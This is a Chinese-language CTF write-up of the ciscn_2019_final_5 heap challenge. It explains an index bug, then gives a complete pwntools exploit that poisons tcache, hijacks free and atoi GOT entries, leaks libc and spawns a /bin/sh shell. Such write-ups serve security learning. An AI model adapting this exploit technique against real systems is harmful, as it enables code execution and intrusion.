ciscn_2019_final_5:
got表可写,pie没开
程序分析:
主界面:
add函数:
delete函数:
由于一般地址都会16位对齐,这里的free用按位与取前15位,最后一位为0
其实也没啥问题
edit函数:
和delete,都是取最后一位为下标
漏洞分析:
漏洞出现在add函数里的index我们能取0x10,即(0001 0000)
而它如果与倒数第五位为0的heap_ptr按位与的话会导致存进heap_list的地址变大0x10
例:我们申请第一个堆的地址最后三位一般为0x260(由于0x250的存在)
0x260(10 0110 0000)与0x10(1 0000)按位与后,delete或edit时为0x270
free到bin链中是+0x10的地址
大致思路:
申请index为16的堆,布置好伪造的size,利用上面的特殊性质
可以释放到bin链中我们控制的size大小,造成堆块复用,我们改fd为heap_list的地址,add后,再add就申请到heap_list处了,我们劫持free_got
泄露libc,再劫持atoi为system,输入/bin/sh
exp:
from pwn import *
from LibcSearcher import *
local_file = './ciscn_final_5'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('ctf.dino209.cn',9126 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
gdb.attach(r,cmd)
def add(index,size,content):
sla('your choice: ','1')
sla('index: ',str(index))
sla('size: ',str(size))
sa('content: ',content)
ru('low 12 bits: 0x')
return int(rc(3),16)
def delete(index):
sla('your choice: ','2')
sla('index: ',str(index))
def edit(index,content):
sla('your choice: ','3')
sla('index: ',str(index))
sa('content: ',content)
#-------------------------------
heap_list=0x6020E0
free_got=0x602018#index 8
atoi_got=0x602078-7#index 1
puts_got=0x602020
add(16,0x20,p64(0)+p64(0x60))
add(1,0xb0,'ppp')
delete(0)
delete(1)
add(2,0x50,'a'*0x10+p64(0)+p64(0xc1)+p64(heap_list))
add(3,0xb0,'p')
add(4,0xb0,p64(atoi_got)+p64(puts_got)+p64(free_got)+p64(0)*17+p32(0x10)*4)
edit(8,p64(0)+p64(elf.sym['puts']))
delete(0)
libc_base=uu64(ru('\x7f')[-6:])-libc.sym['puts']
print 'libc_base='+str(hex(libc_base))
system=libc_base+libc.sym['system']
edit(1,p64(0)+p64(system))
sla('your choice: ','/bin/sh\x00')
#debug()
r.interactive()
其他:
参考师傅:
https://blog.csdn.net/weixin_44145820/article/details/105514596